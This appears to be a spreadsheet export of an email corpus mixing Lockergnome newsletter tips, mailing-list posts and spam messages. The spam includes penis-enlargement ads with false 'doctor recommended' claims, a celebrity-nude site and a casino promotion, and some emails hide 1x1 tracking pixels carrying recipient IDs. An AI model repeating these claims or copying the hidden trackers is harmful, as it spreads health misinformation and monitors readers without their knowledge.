 {Disc device troubleshooting} "This article describes how you can troubleshoot issues reading CD-ROM or DVD-ROM optical discs. This article also discusses how to troubleshoot common issues with CD-R and CD-RW devices. The steps in this article apply to compact disc (CD-ROM) drives, compact disc recordable (CD-R) drives, compact disc re-writable (CD-RW) drives, and digital video disc (DVD) drives." To summarize, you should try the steps on this site before calling your technical support. Some of the steps include closing unnecessary software, testing the disc in a different computer, and cleaning the disc. Make sure to clean a disc by wiping from the center of the disc outward... if you wipe the disc in a circular fashion, then you risk scratching it. The steps in this article will only serve to save you time, as you will probably be able to fix most disc problems by following the steps. If this article doesn't help you resolve your disc problem, look on the bright side... you won't have to spend so much time on the phone with technical support, because you'll already know what the problem ISN'T!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&lt;b&gt;Modem Spy v3.1.3b [230k] W9x/2k/XP $25&lt;/b&gt;&lt;br&gt;
     Unearthed by Sergei Polishchuk
 &lt;p&gt;
 &lt;a class="url" href="http://www.modemspy.com/"&gt;http://www.modemspy.com/&lt;/a&gt;
 &lt;p&gt;
 {Answering machine} "Modem spy is a handy utility for phone calls recording. Features: 1) Records phone conversations. 2) Records from microphone. 3) Plays back recorded messages via phone line. 4) Plays back recorded messages via sound card. 5) Can record ALL incoming phone calls. 6) Has built-in software automatic gain control. 7) Detects and logs Caller ID." Gnomie Brian Stevens tried this one out for us, but had a small problem testing this on any of his machines... he doesn't have any modems! Brian says, "I was able to load the program, though, and try a few of the features out. You can record an audio memo to your machine, much like an answering machine. You can also e-mail this audio memo, although I don't recommend you do that as the WAV file didn't seem to play well when I tried e-mailing it to myself (which may have been due to the microphone it was recorded with). Other than that, Modem Spy is a solid program and is a great alternative to buying a traditional answering machine... plus in most cases it is cheaper!" Keep in mind that, for Caller ID to work, you need the Caller ID service turned on by your phone service provider.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
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt; &lt;b&gt;GET HIGH-SPEED ACCESS:&lt;/b&gt; Verizon Online DSL is an affordable,  high-speed Internet connection.   &lt;a href="http://www.qksrv.net/click-471546-2202776"&gt;Click here&lt;/a&gt;  to see if Verizon Online DSL is available in your area. &lt;img src="http://www.qksrv.net/image-471546-2202776" width="1" height="1" border="0"&gt;    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;The Avocado Papers&lt;/b&gt;&lt;br&gt;
    Unearthed by Meryl Evans
 &lt;p&gt;
 &lt;a class="url" href="http://www.theavocadopapers.com/"&gt;http://www.theavocadopapers.com/&lt;/a&gt;
 &lt;p&gt;
 After surfing serious Web site upon serious Web site, you just need to find a site where you can relax and have a good time. TheAvocadoPapers.com is one of those sites that is a little bit goofy but extremely creative. It isn't that the Web site is really about anything; there is some creative writing (usually rather funny) and the occasional interview (this week "Steve Schneider Interviews Himself"). If you are a little bit nosy, and want to peek into the lives of others, you can read Ron Bork's diary or enter the Avocado Chat. Although the makers of the Web site don't even know what it is about, I think it is quite apparent... fun! Go check out the Web site for yourself and see if you can pin down its rhyme or reason. Worst-case scenario, you can always sign up for their current promotion... free linguine!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This tip is for the Windows XP users out there. "The Windows XP operating system achieves excellent performance in part by dynamic adjustments that it makes in response to how a system is utilized. In particular, many adjustments are made when the system first runs following setup and when newly installed applications are used for the first time. These adjustments greatly influence the performance of the system. Unfortunately, the dynamic nature of Windows XP can make benchmarking more of a challenge than with previous Windows versions." To properly benchmark your Windows XP system, there are a few steps you should follow. The step with which we are concerned in this particular tip is letting your PC process any "idle tasks." Idle tasks are tasks that your PC executes when it deems the system to be unused or idle. Some of these include file placement optimization, system restore, and done-once-after-setup work items. "All of these 'idle tasks' are controllable by a system API in advapi32.dll, ProcessIdleTasks. The API's sole purpose is to allow benchmarks a simple way to force any pending idle tasks to be executed immediately, without having to wait a lengthy period of time. To call ProcessIdleTasks from the command line, use this syntax: Rundll32.exe advapi32.dll,ProcessIdleTasks." Once running, it may take up to around 15 minutes to process all of the idle tasks, and your hard drive will be active through most of it. For more steps on preparing your Windows XP machine for benchmarking, head over to the Windows Platform Development page on Benchmarking for Windows XP on Microsoft's site.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href="http://www.lockergnome.com/issues/daily/20020722.html"&gt;http://www.lockergnome.com/issues/daily/20020722.html&lt;/a&gt;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I finally have proof that the vacuum attachment wants to eat Sprocket. He's been eyeing it for weeks.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/sprocket.vacuum.WMV"&gt;Sprocket's Pipe Dream&lt;/a&gt;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Cranky Beats  --&gt;
 We interrupt this quote for an important bulletin...
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: When Size DOES Matter, you know where to go. --&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;table bgcolor=3D"#FF6666" border=3D"2" width=3D"999" cellspacing=3D"0" ce=
 llpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D"#663399"&gt;&lt;b&gt;&lt;cente=
 r&gt;
 &lt;center&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;font size=3D"6"&gt;DID YOU KNOW? &lt;font size=3D"4"&gt;&lt;br&gt;
 That the average penis size when erect is only 5.7" to 6". 
 &lt;b&gt;Over 90%&lt;/b&gt; of men posses this size. &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; &lt;br&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;font size=3D"6"&gt;DID YOU KNOW? &lt;font size=3D"4"&gt;&lt;br&gt;
 That in a poll conducted by DurexTM Condoms, 
 67% of women said they were &lt;i&gt;un&lt;/i&gt;happy with their lover's penis &lt;b&gt;siz=
 e&lt;/b&gt;. 
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"#FFFFFF"&gt;
 Having a small penis can affect your self-image, and how you view yourself=
  and the world. &lt;br&gt;&lt;br&gt;
 If you feel confident about your manhood, you approach the world different=
 ly, &lt;br&gt;
 with extreme confidence and pride.&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;
 LET US 
 &lt;a href=3D"http://www.freehostchina.com/Yangtze/pleasurex/"&gt;SHOW YOU&lt;/a&gt; H=
 OW!&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;
 YOU can add significant PERMANENT size to your penis, &lt;br&gt;
 easily, naturally, and safely, in just a few minutes per day! &lt;br&gt;&lt;br&gt;
 The groundbreaking techniques we offer are 100% proven, tested, &lt;br&gt;
 and &lt;b&gt;Doctor Recommended&lt;/b&gt;, and have worked for &lt;i&gt;thousands&lt;/i&gt; of men=
  JUST LIKE YOU! &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;font size=3D"6"&gt;DID YOU KNOW? &lt;font size=3D"4"&gt;&lt;br&gt;
 That 98% of men have a much weaker, smaller more underdeveloped penis 
 compared to what they &lt;i&gt;could&lt;/i&gt; possess. 
 &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; &lt;br&gt;
 &lt;font size=3D"6"&gt;
 CHANGE THAT &lt;a href=3D"http://www.freehostchina.com/Yangtze/pleasurex/"&gt;NO=
 W!&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;
 &lt;center&gt;
 ***Don't be fooled by what nature gave you, take CONTROL!***&lt;br&gt;
 ***No gimmicks, just superb medical breakthroughs! ***&lt;br&gt;
 &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt; 
 |&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br&gt;|&lt;br&gt;|&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br=
 &gt;|&lt;br&gt;|&lt;br&gt;|&lt;br&gt; |&lt;br&gt; |&lt;br&gt; |&lt;br&gt;|&lt;br&gt;|&lt;br&gt;\/&lt;br&gt;&lt;br&gt;
 &lt;table bgcolor=3D"#FFFF00" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;font size=3D"6"&gt;DID YOU KNOW? &lt;font size=3D"4"&gt;&lt;br&gt;
 That the average man ejaculates within 2 to 2.5 minutes of insertion into =
 the female. 
 &lt;br&gt; &lt;br&gt; 
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; 
 &lt;font size=3D"6"&gt;
 Our Exercises &lt;b&gt;WILL&lt;/b&gt; lengthen this time &lt;a href=3D"http://www.freehos=
 tchina.com/Yangtze/pleasurex/"&gt;CONSIDERABLY!&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;
 &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Don't get ripped off!  Things to watch out for:
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;table bgcolor=3D"663399" border=3D"2" width=3D"999" cellspacing=3D"0" cel=
 lpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt;  &lt;font color=3D"#9999FF" &gt; 
 &lt;font size=3D"6"&gt;&lt;center&gt;
  &lt;br&gt;&lt;br&gt;&lt;font face=3D"arial"&gt;
 &lt;hr&gt;&lt;b&gt;Don't get ripped off! Gimmicks to look out for: 
 &lt;/b&gt;&lt;hr&gt; &lt;br&gt; &lt;font color=3D"#FFCCCC"&gt;
 &lt;font size=3D"5"&gt;
  &lt;font color=3D"#FF6666"&gt;&lt;b&gt; Vacuum Pumps: Expensive Rip-off&lt;/b&gt;&lt;br&gt;&lt;font =
 color=3D"#FFCCCC"&gt; &lt;/center&gt;
  &lt;br&gt;&lt;br&gt; 
 Most men aren't going to wait a whole year to gain 1" !!!!&lt;br&gt;
 Or do it the right way, instead they think the more they pump the faster t=
 he results. &lt;i&gt;WRONG!&lt;/i&gt;&lt;br&gt;&lt;br&gt;A vacuum pump will &lt;b&gt;injure your penis&lt;/=
 b&gt; before it will enlarge your penis.&lt;br&gt; 
  &lt;br&gt;&lt;br&gt; 
 &lt;center&gt;
 &lt;table bgcolor=3D"#33FF99" border=3D"2" width=3D"900"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;&lt;font color=3D"#333399"&gt;Lengthen your manhood the FAST, N=
 ATURAL way! Check out our &lt;b&gt;new, state of the art &lt;/b&gt;
 &lt;a href=3D"http://www.freehostchina.com/Yangtze/pleasurex/"&gt;system&lt;/a&gt;&lt;br&gt;=
 &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; &lt;br&gt;
 &lt;center&gt;
 &lt;font color=3D"#FF6666"&gt;&lt;b&gt;Weight Hanging: Dangerous Rip-off&lt;/b&gt;&lt;/center&gt;
 &lt;font color=3D"#FFCCCC"&gt; &lt;br&gt;&lt;br&gt; 
 Only lengthens the penis, does &lt;b&gt;not&lt;/b&gt; thicken it, while LESSENING sens=
 ation during intercourse.&lt;br&gt; 
 And to top it off, it creates unsightly stretching marks, and could cause =
 permanent damage&lt;br&gt;
 &lt;i&gt; which could easily require partial amputation of the penis!&lt;/i&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;table bgcolor=3D"#33FF99" border=3D"2" width=3D"900"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;&lt;font color=3D"#333399"&gt;Obtain a longer, THICKER penis wi=
 thout the risks and the pain! 
  Choose the latest scientific breakthroughs, over barbaric tribal techniqu=
 es&lt;/b&gt;
 &lt;a href=3D"http://www.freehostchina.com/Yangtze/pleasurex/"&gt;NOW!&lt;/a&gt;&lt;br&gt;&lt;b=
 r&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; &lt;br&gt;
 &lt;center&gt;
 &lt;font color=3D"#FF6666"&gt;&lt;b&gt;Weight Hanging: Dangerous Rip-off&lt;/b&gt;&lt;/center&gt;
 &lt;font color=3D"#FFCCCC"&gt; &lt;br&gt;&lt;br&gt; 
 Penis enlargement surgery is a VERY dreaded, painful, and dangerous operat=
 ion&lt;br&gt;
  that has a quite HIGH nonsuccess rate according to patient opinion. &lt;br&gt;&lt;=
 br&gt;
 Here are just SOME results. &lt;br&gt;
 Deformed looking penis(Lumps &amp; Pits), Impotence, Loss of sex drive, &lt;br&gt;
 Painful Erections, &lt;b&gt;if any at all&lt;/b&gt;!! 
 &lt;br&gt; &lt;br&gt; &lt;br&gt; 
 &lt;center&gt;
 &lt;table bgcolor=3D"#33FF99" border=3D"2" width=3D"900"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;&lt;font color=3D"#333399"&gt;&lt;b&gt;SAVE your HARD EARNED DOLLARS!=
 &lt;/b&gt; Spending more is NOT always the best solution. Obtain a healthy looki=
 ng, longer penis without scary surgery, and any chance of impotence! Learn=
  more about our amazing exercise techniques! 
 &lt;a href=3D"http://www.freehostchina.com/Yangtze/pleasurex/"&gt;Special Offer!=
 &lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; &lt;br&gt;
 &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt;&lt;br&gt; &lt;br&gt;&lt;br&gt; &lt;br&gt;&lt;br&gt; &lt;br&gt; &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brad Pitt Caught Naked With Wife!                 27283
</t>
  </si>
  <si>
    <t xml:space="preserve">
 SHOCKING PAPARRAZZI NUDE CELEBRITY PICS &amp; VIDEOS!
 Naked Male and Female Stars caught on tape! Real
 Photos and Footage of Celebrities caught Skinny
 Dipping, Sun Bathing in the Nude, Cheating, Jerking
 Each Other Off and Feeling Each Other Up in PUBLIC!
 The list of Celebrities is Endless!
 Brad Pitt, Denise Richards, Christian Bale, Pamela
 Anderson, Ricky Martin, Christina Applegate, Antonio
 Sabato Jr, Gillian Anderson, Ben Affleck, Jennifer
 Love-Hewitt, Alexis Arquette, Jennifer Lopez......
 Any Celebrity you can think of is here!
 http://www.celebritysnude.net/index.html?id=2010868
 Bonus Material:
 Houston 620, Celebrity Fakes, Amateur Wannabes, Naked
 Soap Stars, barely Legal Celebs, Before the Fame,
 Celeb Date Contest + Much Much More......Enter Now:
 http://www.celebritysnude.net/index.html?id=2010868
 Send a blank email here to be removed from database:
 mailto:nude_celebs@excite.com?subject=remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get $100 Free - Beat the House at Royal Vegas!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;:::::: Royal Vegas Online Casino -- Beat the House at Royal Vegas !!! ::::::&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#000000&gt;
 &lt;TABLE WIDTH=550 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_01.jpg" WIDTH=153 HEIGHT=31 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_02.jpg" WIDTH=347 HEIGHT=31&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_03.jpg" WIDTH=50 HEIGHT=31&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_04.jpg" WIDTH=153 HEIGHT=66 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_05.gif" WIDTH=111 HEIGHT=66 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_06.jpg" WIDTH=121 HEIGHT=66 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_07.jpg" WIDTH=115 HEIGHT=66 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_08.jpg" WIDTH=50 HEIGHT=66&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_09.jpg" WIDTH=153 HEIGHT=77 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_10.jpg" WIDTH=111 HEIGHT=77 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_11.gif" WIDTH=121 HEIGHT=77 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_12.jpg" WIDTH=115 HEIGHT=77 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_13.jpg" WIDTH=50 HEIGHT=77&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_14.jpg" WIDTH=153 HEIGHT=69&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_15.gif" WIDTH=111 HEIGHT=69 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_16.jpg" WIDTH=121 HEIGHT=69 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://www.prizeinthebag.net/page4/default.asp?btag=MS_262100_267100_183556" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_17.gif" WIDTH=115 HEIGHT=69 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_18.jpg" WIDTH=50 HEIGHT=69&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_19.jpg" WIDTH=153 HEIGHT=49&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_20.jpg" WIDTH=111 HEIGHT=49&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_21.jpg" WIDTH=121 HEIGHT=49&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_22.jpg" WIDTH=115 HEIGHT=49&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_23.jpg" WIDTH=50 HEIGHT=49&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD COLSPAN=2&gt; &lt;a href="http://www.prizeinthebag.net/page8/default.asp?btag=MS_179300_267100_183615" target="_blank"&gt;&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_24.gif" WIDTH=264 HEIGHT=22 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_25.jpg" WIDTH=121 HEIGHT=22&gt;&lt;/TD&gt;
     &lt;TD COLSPAN=2&gt; &lt;IMG SRC="http://www.prizeinthebag.net/images/RV/movie/Oceans-11_c_26.jpg" WIDTH=165 HEIGHT=22&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana color="FFFFFF"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href="http://www.frugaljoe.com/unsubscribe.php?eid=340329\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=340329\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@example.com&amp;oid=Casino-09242002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 00:05, Matthias Saou wrote:
 &gt; It's 100% untested, although the build should be ok. The new menu was
 &gt; added, but some configuration files may be better with new or different
 &gt; defaults.
 &gt; 
 &gt; Feedback is very welcome!
 Looks good to me, just installed it, and ran a local scan, everything
 worked smoothly.  Thanks a bunch!
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Sysadmin / IT person wanted
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, folks -
 Wearing my other hat today - we're looking for a competent and
 experienced system administrator here, and I'd like anyone who's
 interested to contact me.
 The job is for a Windows (NT and 2000) and Linux (Debinan) system and
 network administrator, with a good, deep knowledge of both
 environments.  The successful candidate will have a broad range of
 responsibilities in maintaining and developing our IT and production
 infrastructure, including WAN/secure networking to remote offices,
 email systems management, backups, etc., so experience in managing
 larger networks is required.
 Some development and implementation research experience would also be
 highly desireable.
 In addition, the position will involve internal IT support for a
 primarily Windows network with approximately fifty users in several
 locations.
 The precise remuneration package will depend on the skillset of the
 successful applicant, but will include as standard a performance-based
 bonus scheme, health insurance, stock options and participation in a
 company-backed pension plan.
 Please contact me directly if you wish to apply.
 We now return you to your regularly-scheduled hrishy.
            Colm
 -- 
 Colm Buckley - Systems Architect at NewWorldIQ
 w : http://www.newworldiq.com/    e : colm@newworldiq.com
 t : +353 1 4334334    f : +353 1 4334301    m : +353 87 2469146
 Quantum mechanics: the dreams stuff is made of.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The Big Jump
</t>
  </si>
  <si>
    <t xml:space="preserve">
 So uh, would this qualify for the Darwin awards if he doesn't make it?
 Freaking french people...
    :-)
 -BB
 RH&gt; Today a French officer called Michel Fournier is supposed to get in a
 RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40 km
 RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and reach
 RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at the
 RH&gt; end, although with an automatic backup if he is 7 seconds from the
 RH&gt; ground and still hasn't opened it.
 RH&gt; R
 RH&gt; ObQuote:
 RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di Franza."
 RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 RH&gt;   - Pope Julius II, 2 January 1511
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">This is not an exmh problem, but an interaction between sendmail, Solaris and 
 mh.
 Your sysadmin is wrong.  It is the responsibility of the receiving mail 
 server to escape lines beginning with "From " if they choose to turn on that 
 facility.  It is not the responsibility for email clients to cater to the 
 stupid design of the unix mail spool, and Sun's even more stupid decision to 
 rely on "Content-length:" instead of dealing with this problem.  Since mh is 
 unaware of "Content-length:", rcvstore gags trying to parse messages from the 
 spool.
 I had this same problem.  There are several ways to fix it:
 1)  Get your mail administrator to add the "E" flag to your sendmail.  This 
 means you will never see a line beginning with "From ".  Any such line will 
 look like "&gt;From ".
 2)  There is a patch to mh to make it respect "Content-length:".  When I was 
 having this problem, porting this patch to nmh was low on the priority list, 
 then nmh development stalled for a long time.  I doubt it has been done, but 
 you can check with the nmh list at nmh-workers@mhost.com to find out for sure.
 3)  You can learn to use procmail, invoking rcvstore directly instead of 
 letting sendmail put your incoming mail into the spool.  This avoids the 
 whole issue.  rcvstore only deals with a single message at a time, and 
 everything works.
 -- 
 Jim McMaster
 mailto:mcmasjc@tatanka.stortek.com
 In message &lt;200210091657.g99GvDmX025433@life.ai.mit.edu&gt;, Jason Rennie said:
 &gt; 
 &gt; When I receive a message that has a line starting with "From ", it's
 &gt; broken into two messages.  I get my mail from /var/spool/mail.  The
 &gt; program that incorporates mail thinks that the "From " line starts a new
 &gt; message.
 &gt; 
 &gt; My sysadmins have told me that the sending mail client is supposed to 
